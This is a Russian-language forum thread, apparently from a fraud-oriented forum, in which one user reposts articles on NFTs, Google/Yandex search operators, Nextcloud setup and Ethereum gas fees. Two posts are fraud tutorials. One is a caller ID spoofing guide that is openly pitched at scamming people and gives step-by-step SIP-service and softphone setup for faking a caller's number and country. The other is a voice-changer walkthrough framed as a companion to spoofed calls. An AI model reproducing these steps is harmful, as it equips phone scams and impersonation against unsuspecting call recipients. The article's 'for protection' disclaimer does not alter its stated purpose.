"Всю свою жизнь я слышал от окружающих, что я делаю что-то не так. Это плохо, это невозможно, это недопустимо, этого не поймут. Я никогда не представлял это, но все повернулось так, что быть тем, кто ты есть на самом деле - это недопустимая роскошь, и большинству людей запрещено делать то, что они хотят, и быть тем, кем они хотят. Пытаясь пойти против системы, никогда не знаешь, где окажешься. Ты должен быть осторожен со своими желаниями, и в то же время не отказываться от мечты и надежды, хранить их в надежном месте, в своем сердце и душе".Третья же работа "Адский вызов" пронизана верой на светлое будущее.

"После всего этого унижения, через кровь, пот и слезы за российской решеткой, несмотря ни на что, я верю, что я почти победил в этом ужасающем раунде. В то же время я считаю, что это было послание от Вселенной, которое я принял достойно. Теперь мой черед бросать кости, бросить вызов - я обращаюсь к дикой Метавселенной, со всей ее неограниченностью и разнообразием: пусть игра начнется".

Вам возможно будет это интересно:
  1. NFT - феномен в мире криптовалют
  2. Бум цифрового искусства NFT


https://telegra.ph/Kak-NFT-izmenili-...dozhnika-02-26

BlackMAST 24.03.2022 18:44

https://i.gyazo.com/cb782344113679fc...619b57eccd.jpg

Как подделать номер телефона

Вступить в наш чат

Хочешь заскамить человека, подделав номер входящего звонка и страну? Тогда эта статья придется тебе по вкусу, потому что сегодня мы научимся менять номер вызывающего абонента или заниматься спуфингом.

https://i.gyazo.com/1c05e7798bf807cb...eef43e2cc2.jpg

В переводе с английского spoofing - кибератака с подменой. Выделяют разные виды спуфинга:
  • Caller ID Spoofing (подмена номера входящего вызова)
  • Text Message Spoofing (подмена сообщений)
  • IP Spoofing (подмена IP-адреса)
  • Website Spoofing (подмена сайта)
  • DNS Server Spoofing (подмена DNS-сервера)
  • Email Spoofing (подмена адреса электронной почты)
  • GPS Spoofing (подмена GPS)

В этой статье мы же выделим один из основных видов мошенничества - Caller ID Spoofing.


https://i.gyazo.com/ae9f4df61f17b887...6b0de2df4e.jpg

Мануал:

1. Регистрация

Первым действием вам, конечно же, нужно включить VPN. Это необходимо не только для вашей безопасности, но и для того, чтобы зарегистрироваться на сайте CallWithUs, в противном случае вы не сможете зайти на него. Это не единственный сервис для совершения звонков с подменой номера. Также можно выделить и Sip24.pw.

Сегодня же мы вам покажем, как работает спуфинг на примере CallWithUs. Как только вы зашли на сайт, нажмите в верхней панели кнопку "Sign Up", для регистрации используйте левые данные и временную почту. Например, Temp Mail.

2. Устанавливаем X-Lite

X-lite - это популярный бесплатный программный sip телефон для Windows, MacOs и Linux. X-lite на ваш компьютер можно скачать тут.

После того как скачали и установили, заходим во вкладку "VoIP Accounts" и берем оттуда данные для входа на X-lite.

3. Цена

Для того, чтобы программа работала, необходимо пополнить баланс на CallWithUs. Цены довольно низкие, вы сами создаете свой собственный план обслуживания, включая только те функции, которые вам нужны. Ежемесячного и безлимитного пакетов нет, вы платите только по факту в отличие от многих других телефонных компаний.

4. Настраиваем X-Lite

Запускаем приложение X-Lite, нажимаем на "SIP Account" и затем прописываем следующее:

User ID - @CALLWITHUS_USERNAME@ Domain - sip.callwithus.com Password - @CALLWITHUS_PASSWORD@

5. Выбираем страну

Для того, чтобы выбрать страну входящего звонка, вам нужно нажать "Speed Dial" -> "Select Dialing rule". Если хотите ее поменять, то замените "0" на код страны. Например: 7 - Россия.

6. Устанавливаем номер

Теперь осталось только выбрать номер телефона. Для этого открываем вкладку "Add Caller" и напротив "VoIP Account" вписываем любой номер и подтверждаем "true".

Готово! Теперь ваш собеседник увидит тот номер, который вы сами установите. Таким же образом вы можете менять код страны и номер телефона каждый раз, когда вам нужно.

Текст статьи не является призывом к действию и публикуется для ознакомления со спуфингом в целях защиты.

https://telegra.ph/Poddelyvaem-nomer-telefona-02-08

BlackMAST 25.03.2022 16:14


Как изменить свой голос при телефонном разговоре?

Вступить в наш чат

Причин из-за которых вам может понадобится изменить свой голос довольно много: начиная от безобидного розыгрыша и заканчивая чем-то похуже. Зачастую смена номера телефона и голоса работают в тандеме. Вы не можете звонить с левого номера, но при этом говорить своим голосом. Думаю, что нет нужды объяснять почему так делать нельзя. В прошлой статье мы научились подделывать номер телефона, поэтому сейчас самое время поговорить про изменение голоса.
Цитата:


Когда разговор заходит про специальные программы по изменению голоса, то стоит упомянуть, что большинство из них заточены под пранки, т.е. максимум, что вы сможете сделать - это наложить определенные звуковые эффекты поверх вашего голоса (хомяк, робот, президент). Если вашей целью не стоит розыгрыш друга, то такие программы вам мало чем могут помочь. Найти хорошую программу для смены голоса очень трудно, но нам удалось это сделать и сегодня мы поделимся ею с вами.

MorphVox Pro

MorphVox Pro считается ̶о̶д̶н̶о̶й̶ ̶и̶з̶ ̶с̶а̶м̶ы̶х̶ ̶л̶у̶ч̶ш̶и̶х̶ самой лучшей программой для изменения голоса. (И да, это не реклама.) Несмотря на простой внешний вид в вашем распоряжении большое количество функций и многоуровневая настройка звучания, благодаря которой вы можете изменить свой голос до неузнаваемости и при этом сохранить естественность звучания. Секрет естественного звука кроется в новаторской системе подстройки звука под речь другого человека, чьи параметры уже есть в его базе. Помимо базовых настроек вы также можете установить дополнительные аддоны для увеличения функциональности. Они добавляются через встроенный менеджер, находящийся в меню.

Несмотря на наличие фэнтезийных настроек, есть конфигурации, которые в прямом смысле этого слова помогут вам побывать в "шкуре" другого человека.

Дополнительные возможности

Данная программа имеет ряд и других возможностей помимо главной - изменение голоса в реальном времени.
  • Ручная настройка. Незаменимая функция, с помощью которой вы можете создать свой собственный уникальный голос или же видоизменить настройки готовых голосов.
  • Фоновые эффекты. Во время разговора мы можете наложить любые аудиоэффекты так, чтобы собеседник думал, что вы находитесь в определенном месте (в аропорту, в магазине, на улице и т.д.).
  • Файлы. Если вам нужно изменить звук уже у готовой аудио или видеозаписи, то у вас есть такая возможность. Просто загрузите файл, после чего он будет обработан и сохранен в указанном пользователем месте.


Настройка голоса

Сейчас мы с вами разберем настройку голоса и основные параметры.

1. В меню слева есть уже готовые шаблоны голосов, нажмите "Voice Selection" и просто выберите нужный пол, например, мужской. Если вам не нравятся стандартные голоса и готовые настройки, то вы всегда можете скачать дополнения. Просто перейдите "Voice Selection" -> "Get more voices".

https://i.gyazo.com/eddc00dc93572fce...bed38cbe47.jpg

2. После выбора пресета вы можете оставить его изначальные настройки (но мы так делать не будем) или покрутить ползунки в "Tweak Voice". Чтобы изменить тон голоса, увеличить или уменьшить, подвигайте ползунок "Pitch shift". Для настройки тембра используйте "Timbre" -> "Shift" -> "Strength". Если вы хотите сохранить изменения, то нажмите на "Update Alias".

https://i.gyazo.com/4208ca37a4f982a8...c37447f767.jpg

3. Далее советуем настроить частоты звука с помощью эквалайзера. Для него уже есть несколько настроенных шаблонов для более низких и высоких частот в разделе "Preset".

https://i.gyazo.com/a89bdf9a7eac6a38...34ab44b615.jpg

https://i.gyazo.com/6855fb34488da9a5...1f112f5716.jpg

Если готовые настойки не для вас, то опять же на помощь приходит ручная настройка, остается только подобрать частоту с помощью 10 ползунков, а изменения сохранить кнопкой "Update Alias".

4. Улучшаем звук и подавляем шум. В "Sound Settings" есть ряд возможностей для улучшения звучания вашего голоса. И кроме этого вы можете убрать те шумы, которые возникают при нахождении в общественных местах.

https://i.gyazo.com/0bfcb19283b4a00c...7a46f05a6d.jpg

На этом наша настройка заканчивается. Программа MorphVox Pro легкая в использовании, поэтому вы без проблем сможете настроить голос по своему усмотрению, даже будучи новичком.

Плюсы

  • Простой и многофункциональный интерфейс;
  • Наличие дополнительных возможностей;
  • Гибкая настройка голоса.
Минусы

1. Программа платная. Но мы можете воспользоваться пробным периодом - 7 дней. Если же вы все-таки решите приобрести данную программу, то она обойдется вам почти в 40 долларов;

https://i.gyazo.com/600515be051bb736...aea61e5a82.jpg

2. Программа только на английском языке.

Итог

Безусловно, это не единственная программа с подобным функционалом, но она по праву считается лучшей благодаря естественной настройки звучания. У вас не должно возникнуть никаких сложностей в использовании, разве что только придется действовать методом научного "тыка" из-за большого количества ползунков.

На этом все. Удачи, друзья!

https://telegra.ph/Kak-izmenit-svoj-...azgovore-02-23

BlackMAST 31.03.2022 14:58


Как быстро найти данные в бесконечном потоке информации

Вступить в наш чат

Цитата:


Поисковые системы (Google, Yandex) ежедневно используются миллиардами людей для нахождения какой-либо информации. Но мало кто знает о скрытых возможностях, которые упрощают поиск, освобождая его от лишний информации, а также экономят ваше время. Речь в сегодняшней статье пойдет о поисковых операторах.


Как работают поисковики?

Выделяют три основных этапа работы поисковых систем:
  • Сканирование. За первый этап отвечает поисковой робот или паук. Он собирает и отбирает информацию с сайтов, анализирует изменения в контенте, URL-адреса, а также код и карты сайтов. Все это делается для того, чтобы определить тип отображаемой информации.
  • Индексация. Как только сканирование завершается, индексатор организовывает и совершает быстрый поиск по собранной информации, т.е. анализирует данные сайта.
  • Поисковик. На последнем этапе происходит сортировка сайтов в зависимости от предпочтений запроса, качества и степени соответствия. Таким образом, перед нами предстает контент на странице результатов поиска.
Поисковые операторы

Что такое операторы информации и зачем они нужны?

Поисковые операторы - это специальные слова, символы, фразы, включенные в поисковой запрос, помогают конкретизировать запрашиваемую информацию для выдачи максимально точного результата. Главная их задача - это отфильтровывать запросы с определенным содержимым, сузить данные, исключая ненужную информацию. Вы можете комбинировать операторы друг с другом, чтобы поиск был еще продуктивнее.

Google

Простые поисковые операторы:

+
запрос по нужным словам в одном предложении. Оператор "плюс" помогает в конкретизации поиска. Например, возьмем слово "ключ", которое имеет несколько значений, поэтому чтобы получить тот результат, которые нам нужен, мы уточним запрос: ключ +скрипичный, ключ +родник, ключ +гаечный. В итоге вы получаете те сайты, в которых есть полный набор слов из запроса.

https://i.gyazo.com/99409c2f3e884ed9...6437d7bf79.jpg

- оператор "минус" наоборот исключает слово из запроса. Делая запрос "Ключ -скрипичный", вы получите любую информацию кроме скрипичного ключа.

https://i.gyazo.com/3e1e74fafb2a3ff4...65dcc37f7a.jpg

"" показывают только те страницы, где фраза идет в точно написанной последовательности.

https://i.gyazo.com/3b18688f5372e372...f9c5a165f1.jpg

| (OR) оператор «или», вы можете использовать любой из двух вариантов, чтобы получить запрос по нескольким словам одновременно или по одному из предложенных

https://i.gyazo.com/66a0fd16d31c2370...a1cc6f3e3f.jpg

.. две точки отображают результаты поиска, имеющие конкретных цифровой диапазон. Также обратите внимание, что мы комбинировали 2 поисковых оператора.

https://i.gyazo.com/d41af21896e57a13...5f171f8d73.jpg

@и# – операторы для поиска информации в соц. сетях по тегам и хештегам.

https://i.gyazo.com/0e116e8cd2d00a3c...6817a52e06.jpg

Сложные поисковые операторы:

site:
оператор, который ищет информацию на определенном сайте.

https://i.gyazo.com/b93ce863d2779f3c...ae85bb2a77.jpg

related: оператор для поиска сайтов с похожим контентом.

https://i.gyazo.com/bd07ad6a2b1447af...37303e5b1a.jpg

intitle: поиск страниц по заголовку.

https://i.gyazo.com/8da966093282f747...5dc005a645.jpg

allinurl: оператор, с помощью которого легко найти сайты, содержащие в адресе страницы указанные слова. Для большего отображения страниц лучше всего использовать транслитерацию, либо латиницу.

https://i.gyazo.com/e2da4ed447bd7b85...cf49ff325e.jpg

allintext: поиск по содержимому страницы. Хороший способ найти сайт, если его адрес вы забыли.

https://i.gyazo.com/f7866f8031d837f1...6084590b9f.jpg

intext: поиск как и с предыдущем оператором, только выборка страниц производится по текстовому описанию для одного слова.

info: служит для показа всей информации об адресе.

allinanchor: отбирает страницы с ключевыми словами.

inanchor: похожий оператор, который ищет только по одному заданному слову.

Яндекс

Поисковые операторы:

+ оператор "плюс" работает так же как и у Google.

! используется перед нужным словом для его точного отображения в поиске без изменений.

"" показывают только те страницы, где фраза идет в точно написанной последовательности, как и в Google.

* используется для замещения слов в фразах, песнях, цитатах. Помогает в случае, если вы забыли нужное слово.

( ) оператор "скобки" служит для группировки слов в сложных запросах.

& ставится между двумя словами, а поисковик ищет страницы, где эти слова находятся в одном предложении.

title: оператор, который ищет по заголовкам сайтов.

mime: помогает найти документы нужного формата, к примеру mime












https://darkmoney.one/images/smilies/tongue.gif

df.

site: выборка по всем страницам сайта.

inurl: находит страницы только с ключевыми словами данного домена.

Как составлять запрос:
  • Искать в разных поисковых системах;
  • Искать одну и ту же информацию на разных языках (английский);
  • Менять порядок слов;
  • Использовать синонимы;
  • Ну и, конечно же, использовать поисковые операторы.

https://telegra.ph/Kak-bystro-najti-...formacii-03-30

BlackMAST 07.04.2022 15:03

Цитата:


Nextcloud - это альтернатива Dropbox, Google Drive, Onedrive со своими значительными преимуществами. Это программное обеспечение с открытым исходным кодом, которое позволяет хранить личные данные, не переживая за их безопасность, так как информация хранится на подконтрольном сервере. Самой интересной фишкой данного хранилища является то, что оно может выступать не только в роли файлового хостинга, но и закрытого сообщества, где вы можете общаться с помощью аудио и видео звонков, переписываться или вовсе превратить хранилище в рабочее пространство. Доступ к Nextcloud возможен с любых устройств, например, с телефона или компьютера.

https://i.gyazo.com/70b68f88c8fd31c1...f702519085.jpg

Сегодня мы научимся настраивать облачное хранилище менее чем за пол часа.

Скачать Nextcloud

Устанавливаем Next Cloud
Цитата:


В качестве серверной системы мы будем использовать Ubuntu 20.04.


Настройка будет осуществляться с помощью системы пакетов Snap. Она по умолчанию доступна в Ubuntu 20.04. Это означает, что процесс установки будет максимально простым., так как вместо установки и настройки веб-сервера и сервера базы данных и настройки приложения Nextcloud для работы с ними мы можем установить пакет snap, который автоматически настроит все системы.
Цитата:


Чтобы загрузить пакет Nextcloud snap и установить его в системе, введите:


sudo snap install nextcloud Пакет Nextcloud будет загружен и установлен на ваш сервер. Вы можете проверить успешность установки посредством вывода изменений, связанных с пакетом snap:
snap changes nextcloud

Output ID Status Spawn Ready Summary 4 Done today at 16:12 UTC today at 16:12 UTC Install "nextcloud" snap Информация о состоянии и сводная информация показывают, что установка была выполнена без проблем.

Дополнительная информации о Nextcloud Snap
Если вам нужна дополнительная информация о Nextcloud snap, вам могут помочь несколько полезных команд.
Команда snap info показывает описание, доступные команды управления Nextcloud, установленную версию и отслеживаемый канал snap:
snap info nextcloud Посмотреть сетевые интерфейсы пакета:
snap interfaces nextcloud Результат:
Output Slot Plug :network nextcloud :network-bind nextcloud - nextcloud:removable-media Посмотреть список служб пакета:
cat /snap/nextcloud/current/meta/snap.yaml

Настраиваем учетную запись Nextcloud
Создание учетной записи Администратора:
sudo nextcloud.manual-install имя пароль Вместо «имя» вводим имя администратора учетной записи и вместо слова «пароль» вводим непосредственно придуманный пароль для учетной записи.
Следующее сообщение указывает, что настройка Nextcloud выполнена правильно:
Output Nextcloud was successfully installed После установки Nextcloud нам необходимо настроить доверенные домены, чтобы Nextcloud реагировал на запросы с использованием доменного имени или IP-адреса сервера.

Настраиваем доверенные домены

Первый способ:

Для доступа к Nextcloud мы будем использовать доменное имя сервера или IP-адрес, и поэтому нам нужно изменить эту настройку, чтобы можно было применять запросы этого типа.
Вы можете просмотреть текущие настройки, запросив значение массива trusted_domains:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost В настоящее время в массиве содержится только первое значение localhost. Мы можем добавить запись для доменного имени или IP-адреса нашего сервера, введя следующее:
sudo nextcloud.occ config:system:set trusted_domains 1 --value=example.com

Output System config value trusted_domains => 1 set to string example.com Если мы снова запросим значение trusted domains, мы увидим уже две записи:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost example.com

Второй способ:

Если у вашего сервера Nextcloud нет доменного имени, вы можете защитить веб-интерфейс, создав сертификат SSL с собственной подписью. Этот сертификат обеспечит доступ к веб-интерфейсу через шифрованное соединение, но не сможет подтверждать подлинность вашего сервера, и поэтому ваш браузер может вывести предупреждение при попытке открыть сервер.
Чтобы сгенерировать сертификат с собственной подписью и настроить Nextcloud для его использования, введите:
sudo nextcloud.enable-https self-signed

Output Generating key and self-signed certificate... done Restarting apache... done Показанный выше результат означает, что Nextcloud сгенерировал и активировал сертификат с собственной подписью.
Теперь, когда вы защитили интерфейс, откройте веб-порты брандмауэра, чтобы разрешить доступ к веб-интерфейсу:
sudo ufw allow 80,443/tcp

Настройка успешно завершена.

Входим в Nextcloud
Поскольку вы уже настроили учетную запись администратора из командной строки, вы перейдете на страницу входа Nextcloud. Введите учетные данные, которые вы создали для администратора:


https://i.gyazo.com/def32381d1a9a2c8...7c755673bd.jpg

Нажмите кнопку "Войти" для входа в Nextcloud.

При первом входе откроется окно с приветственным текстом и ссылками на различные клиенты Nextcloud:

https://i.gyazo.com/d935caa94c211e89...bfc6d546e8.jpg

Загрузите любые клиенты, которые вам интересны. Далее вы перейдете в главный интерфейс Nextcloud, где сможете выгружать файлы и управлять ими:

https://i.gyazo.com/579fb321fccbdf63...2605858781.jpg

Дополнительные настройки NextCloud

В NextCloud доступно огромное количество приложений для расширения функциональности:
  • Auto Groups – автоматическое добавление пользователей в группы;
  • Checksum – вычисление хеш-сумм файлов (md5, sha1, sha256, sha384, sha512 и crc32);
  • Music – удобный аудио плеер;
  • News – приложение для чтения новостей с помощью формата RSS/Atom;
  • ONLYOFFICE – офисное приложение для создания и редактирования документов. Созданные документы автоматически сохраняются в облаке;
  • Registration – добавление опции регистрации на главной странице;
  • Social login – регистрация с помощью соц. сетей;
  • Social – чат;
  • Talk – видео и аудио звонки, создание комнат для обсуждения. Для мобильных устройств доступно отдельное приложение.
Цитата:


В следующей статье мы более подробно рассмотрим начало работы в Nextcloud, полезные фишки и различные настройки.


Заключение

Nextcloud - это многофункциональное программное обеспечение, которое является не только облачным хранилищем, но и целой сетью, где можно общаться, слушать музыку, работать и совершать конференции. И самое главное, что все данные хранятся в защищенном месте, которое вы сами и контролируете.

BlackMAST 11.04.2022 21:26

Цитата:


Nextcloud - это не просто облачное хранилище, а это целое сообщество, где можно чатиться, совершать аудио и видео звонки, и при этом оставаться анонимным.

В прошлой статье мы научилисьнастраивать Nextcloud, а сегодня поговорим об основных функциях,

о которых вам следует знать.


https://i.gyazo.com/cedee2c83d3f3327...bd09bd52a2.jpg

Начало работы

После установки Nextcloud выглядит как обычное файловое хранилище.

Но это легко поправимо, мы покажем как установить на него дополнительные приложения, чтобы повысить его функциональность. В правом верхнем углу нажимаем на иконку пользователя и выбираем "Приложения"

https://i.imgur.com/Qflv0ik.jpg

https://i.gyazo.com/526e09836c2947d9...4c77d55105.jpg

В разделе «Пакеты приложений»находится огромный список программ. Узнать подробнее о каждой программе можно, нажав на ее заголовок. Нам же более интересен «Основной набор приложений» : вы можете можно включить как все приложения, так и отдельные. Затем введем пароль администратора, и установка начнется. По ее завершению иконки приложений вы найдете в верхней панели.

Как добавить учетные записи

Для того, чтобы использовать Nextcloud совместно с другими пользователями, вам нужно добавить их учетные записи. Сделать это можно, выбрав в правом верхнем углу иконку администратора -> «Пользователи»:

https://i.gyazo.com/54bb46aea0bef407...6cf38143f7.jpg

Для удобства можно создать дополнительные группы, чтобы установить уровень доступа. По умолчанию есть группа «Администраторы» с полным доступом к приложению, но вы можете создать, например, группу «Сотрудники» и добавлять туда учетные записи с лимитированным доступом, например, тех, кому пользоваться приложениями можно, а менять настройки Nextcloud уже нельзя:

https://i.gyazo.com/61b2f7b6d281e623...8498818ca3.jpg

Придумываем логин, указываем отображаемое имя, пароль, почтовый ящик, присваиваем группу и устанавливаем ограничение дискового пространства для каждого пользователя.

Как настроить дополнительные инструменты

После того как добавили пользователей, переходим к настройке дополнительных функций.

Календарь

Календарь может понадобится для работы: указать конкретные задачи, обозначить сроки и т.д. Попасть в раздел календаря вы можете в верхнем меню приложений:

https://i.gyazo.com/7c75d21921f15011...6192d1ec71.jpg

Импорт готового календаря

Допустим, у вас уже есть готовый календарь со всеми событиями и задачами, и вы только хотите загрузить его в Nextcloud. Для этого экспортируйте его в файл .ics и загрузите в наше приложение в разделе Параметры и импорт -> Import Calendar.

https://i.gyazo.com/11c729ed95836383...ea37ba4276.jpg

Создание нового календаря

Если готового календаря у вас нет, то давайте создадим новый таким способом:

https://i.gyazo.com/2c985ebeda77efec...fa2077c35f.gif

  • 1. Кликните на кнопку + Создать календарь в левой части экрана.
  • 2. Запишите название, например, Работа.
  • 3. Нажмите на «галочку» - календарь будет создан, а все события будут доступны с любых устройств для всех пользователей, которых подключите к нему.
Подключить пользователей к календарю можно вручную, добавляя каждого отдельно или всю группу, например, «Сотрудники». Но вы также можете предоставить доступ к календарю с помощью ссылки -> "Поделиться ссылкой". После того, как пользователи перейдут по ссылке, они сами автоматически добавятся к календарю.

https://i.gyazo.com/452ede769ecc5a6c...00104e64b6.jpg

Задачи

Стоит отметить, что календарь и сам неплохо справляется с этой функцией, но если вам нужно более четкое структурирование задач и отслеживание их выполнения, вы можете воспользоваться инструментом Deck.

https://i.gyazo.com/79b781ca717723a7...fcc7635874.jpg

На скрине выделена кнопка +Создать рабочую доску, а еще "Поделиться»" и "Параметры" для уже готовых досок.

Если вы "Поделитесь" ссылкой, то автоматически разрешите доступ конкретному человеку или группе пользователей.

https://i.gyazo.com/f4a0c6caf5796708...0a67580a74.jpg

На странице "Параметры" вы можете вносить любые изменения: переименовать доску, удалить ее или добавить в архив. В созданной доске каждый желающий пользователь с доступом может вносить изменения в задания. Сначала создаются списки с категориями заданий, в каждый список можно добавлять карточки со списками конкретных задач.

Далее составляются списки заданий, в каждом из них можно добавлять карточки с определенными заданиями. С помощью меток статуса можно определить статус задания и его выполнение. Также к каждой задаче можно прикреплять сотрудника, устанавливать срок выполнения, загружать дополнительные файлы и приложения.

BlackMAST 14.04.2022 18:54


Вступить в наш чат
NFT-токен - это уникальный, подлинный цифровой актив, который нельзя заменить на любой другой. Поскольку спрос на невзаимозаменяемые токены стремительно растет, вы можете не только инвестировать в NFT, но и попробовать создать свои собственные. Если вы это уже сделали, то наверняка столкнулись со следующей проблемой: "Как их продвигать?". Заручиться поддержкой аудитории и повысить свою узнаваемость - дело не из легких. Однако, существуют способы, которые помогут вам это сделать. О них мы и поговорим в этой статье.

https://i.imgur.com/SB7ijvs.jpg

рост популярности NFT

Для начала вспомним, в виде чего мы можем создавать NFT:
  • Фото/видео
  • Арт
  • Музыка
  • Gif
  • Предметы в играх
  • Твиты
Цитата:


Самые дорогие NFT за всю историю

Чтобы приобрести любой NFT достаточно зарегистрироваться на любой площадке вроде Binance и создать счет. Далее смотрим доступные к покупке токены и жмем "Купить".Готово.

https://i.imgur.com/iqAk180.jpg

Если с покупкой все более менее понятно, то как быть с продажей?

Платформа

В первую очередь следует выбрать и зарегистрироваться на платформе. У каждой из них есть свои отличия и особенности, поэтому окончательное решение остается за вами. Главное, на что необходимо обратить внимание - это наличие Ethereum.

Кошелек

Затем нужно открыть свой Ethereum кошелек. Лучшими NFT-кошельками единогласно признают:
  • Metamask
  • AlphaWallet
  • Trust Wallet
  • Coinbase Wallet
  • Enjin
А теперь самое главное - продвижение:

Создайте блог про NFT

Главное, что вы должны знать про продвижение NFT, так это то, что оно напрямую взаимосвязано с продвижением вашего блога, т.е. вы должны продвинуться в соц. сетях перед тем, как начать продавать NFT. "Впаривать" аудитории свои токены не нужно, поначалу вы должны в стать проводником для них в мир невзаимозаменяемых токенов, так как до сих пор многие люди не имеют ни малейшего понятия, что это такое.

Запомните, что клиент никогда не купит то, о чем он не знает, поэтому взгляните на это с другой стороны, вспомните, когда вы первый раз узнали про NFT, что вам было интересно. Расскажите им, что такое NFT,метавселенная, про отличие от другой криптовалюты, самые дорогие токены, зачем нужно инвестировать в NFT и как их можно купить и продать. Чем больше образовательного контента на первых порах, тем лучше же для вас.

Где вести свой блог? Не стоит заводить аккаунты во всех социальных сетях, так как это слишком энергозатратно, достаточно сосредоточиться на 4 основных платформах, там вы сможете найти свою целевую аудиторию:
  • Instagram
  • Twitter
  • BitCoinTalk
  • Telegram
Расположив к себе подписчиков и став для них неким экспертом в области NFT, вы сможете быстрее продать свои токены в дальнейшем.

Покупайте рекламу

Иногда единожды удачно купленная реклама стоит года тщетных попыток продвинуть аккаунт. Не думайте, что, создав блог, к вам полетят тысячи подписчиков. К сожалению, так бывает, но очень редко, чаще всего продвижение стоит денег.

Но для того, чтобы не спустить эти деньги на ветер, найдите подходящего инфлюенсера, который в своем аккаунте расскажет про ваш замечательный блог. Важно, чтобы тематика ваших аккаунтов совпадала (он рассказывает про биткоины, а вы про NFT), в противном случае после такого продвижения подписчиков не прибавится. Если не хотите заморачиваться с поиском инфлюенсера, то настройтесь таргетинговую рекламу в Instagram. Ключевым словом является "таргетинговая", т.е. реклама для тех людей, которые были бы заинтересованы в покупке NFT в данный момент. Это легко делается с помощью инструментов в инстаграме.

SEO

Повысьте свою узнаваемость с помощью SEO (приемы, которые помогают поднять вас в топ рейтинга поисковых систем). Как вы собираетесь продавать NFT, если ваше имя не отображается в результатах поиска? Данный шаг очень важен, если вы хотите, чтобы клиенты вас могли найти самостоятельно.

Если вы не дружите с поисковой оптимизацией, то не раздумывая, обратитесь к SEO-специалистам.

Самопиар

Как только вы наберете N-количество подписчиков, время действовать. Расскажите клиентам про тему ваших NFT, что вы создали, какие проекты вы готовите. Делайте акцент на контент-маркетинге, так это поможет деликатно ознакомиться потенциальных покупателей с вашими токенами. Сделать самопиар ненавязчивым можнос помощью нескольких уловок:
  • Краткость - сестра таланта. Не пишите длинные статьи, их никто не будет читать, ваша задача - передать суть несколькими предложениями. А еще пытайтесь выражать мысли простым языком без использования заумных фраз и прочих сложностей;
  • Используйте слова- триггеры (с призывами). Что-то вроде "Получите бесплатный NFT", "Только сегодня скидка 50 %". Это действительно работает.
  • Срочность. Внушите подписчикам, что ваше предложение ограничено, сказав, что скидка действует только сегодня или предложение истекает через час. Этот способ будет работать в том случае, если вы не будете злоупотреблять им.
  • Красивый визуал. Это особенно актуально для инстаграма. Позаботьтесь о ярких картинках, инфографике и коротких роликах, тогда ваш пост не останется без внимания.
И, конечно же, не забывайте про дружеский настрой, будьте с подписчиками на одной волне, спрашивайте, что им было бы интересно, отвечайте на их вопросы.

NFT-маркетплейсы

Чтобы продать NFT, вы должны разместить их на нескольких маркетплейсах как на платформах, специализирующихся исключительно на NFT, та и на универсальных площадках. Чем чаще покупатели будут видеть ваши NFT, тем выше шанс, что их купят.

Список самых популярных NFT-маркетплейсов:
  • Foundation - для диджитал-арта;
  • MakersPlace - для компьютерной графики;
  • SuperRare - для цифровых произведений искусства;
  • OpenSea - для предметов искусства, фото, музыки, спортивных карточек и коллекционных гифок;
  • Rarible - для коллекционных крипто-предметов;
  • Enjin — для активов блокчейна;
  • KnownOrigin - для редких коллекционных предметов искусства;
  • MythMarket - для коллекционных карточек.


Прокачайте PR

Распространяйте информацию о своих NFT по крупным информационным площадкам, СМИ. Если нет конкретной договоренности с изданием, напишите пресс-релиз, расскажите о своих токенах и разошлите журналистам. Не ждите, что к вам постучаться в дверь с просьбой взять у вас интервью - будьте тем кто сам стучиться во все двери, стараясь ухватиться за любую возможность.

Оптимизируйте коэффициент конверсии - CRO

Все ранее перечисленное должно давать положительный эффект на конверсию, иначе ни в контент-маркетинге, ни в PPC-рекламе смысла нет. Поэтому постоянно контролируйте показатели конверсии и меняйте стратегию продвижения, если они падают, а не повышаются.

Чтобы повысить доверие к вам - публикуйте отзывы клиентов, продумывайте подачу контента (о чем конкретно писать, на каких площадках размещать, в какие дни публиковать). Таким образом, вы должны продумать каждую деталь, чтобы ваше дело принесло плоды.

Итог

Пока другие только узнают о существовании NFT, будьте теми, кто поможет им разобраться во всех тонкостях невзаимозаменяемых токенов. Не бойтесь неудач, грамотно выстраивайте свой бизнес план, дабы их избежать. Удачи!
Цитата:


Интересно узнать, как заключенный смог стать успешным NFT- художником, заработав миллион? - Читайте здесь.


BlackMAST 18.04.2022 18:08




https://i.gyazo.com/c7ef048cf759d7ef...74e40a1367.jpg

Вступить в наш чат

Цитата:


Впервые слышите такое понятие как "газ", хотя уже знакомы с криптовалютой и сетью Ethereum? Тогда эта статья для вас, мы разберемся вместе с вами, что такое GAS и зачем его платят в сети эфира.


https://i.gyazo.com/fb2f32288fae5908...e559d9a42d.jpg

Что такое газ

Простыми словами, газ или GAS - это плата, которая происходит каждый раз, когда вы совершаете операции в сети эфира. Если в сети Bitcoin - комиссия, то в сети Ethereum - это газ.

Таким образом, цена на газ эфира - это обычная комиссия за покупку, добавление своего NFT, вывод денег и практически любое действие, связанное с криптовалютой. Дело в том, что комиссия, она же цена на газ, меняется ежеминутно. Почему это происходит?

Когда пользователи впервые слышат про это, у них появляется еще больше вопросов. К примеру, с Bitcoin все ясно: сеть нужна для переводов крипты, где вы сами устанавливаете комиссию - чем выше комиссия, тем быстрее поступит перевод.

Когда дело заходит про Ethereum, то стоит понимать, что главная задача сети - это поддержка выполнений смарт-контрактов. Это специальная программа для проверок переводов. Помимо это сеть эфира нужна для:
  • Переводов Эфириума другому пользователю;
  • Формирования смарт-контрактов (программ) и записи их в блокчейн;
  • Обеспечения работы этих смарт-контрактов (программ) .
Стоимость газа

Когда вы пользуетесь блокчейном, вы, сами того не осозновая, используете мощности компьютеров других пользователей, которые как раз и берут за это комиссию или плату за газ.

Плата за газ может изменяться, смотря на загруженность блокчейна и сложность задачи. Если помимо вас совершает транзакцию большое количество других пользователей, то цена на газ растет, так как в блокчейне эфира есть лимит на транзакции - 30 за 1 секунду. Так что, пользователи, которые не хотят ждать большой очереди, платят повышенную комиссию. Повышенный спрос на операции прямо пропорционален цене газа.

Также отмечают, что рост цены на газ может зависеть от тарифов на коммунальные услуги. Держатели компьютеров, чьими услугами вы пользуетесь, вынуждены обслуживать их, а точнее платить счета за обычное электричество.

https://i.gyazo.com/26b72f4d26194155...d927453d4e.jpg

Как не платить большую комиссию

От цены за газ и лимита газа зависит скорость выполнения транзакции и, если вы поставите очень низкий процент, то время ожидания выполнения операции может увеличиться от нескольких часов до пары дней.

Для того, чтобы не переплачивать за каждую операцию, следует поставить ограничения на цену за газ и на лимит газа.

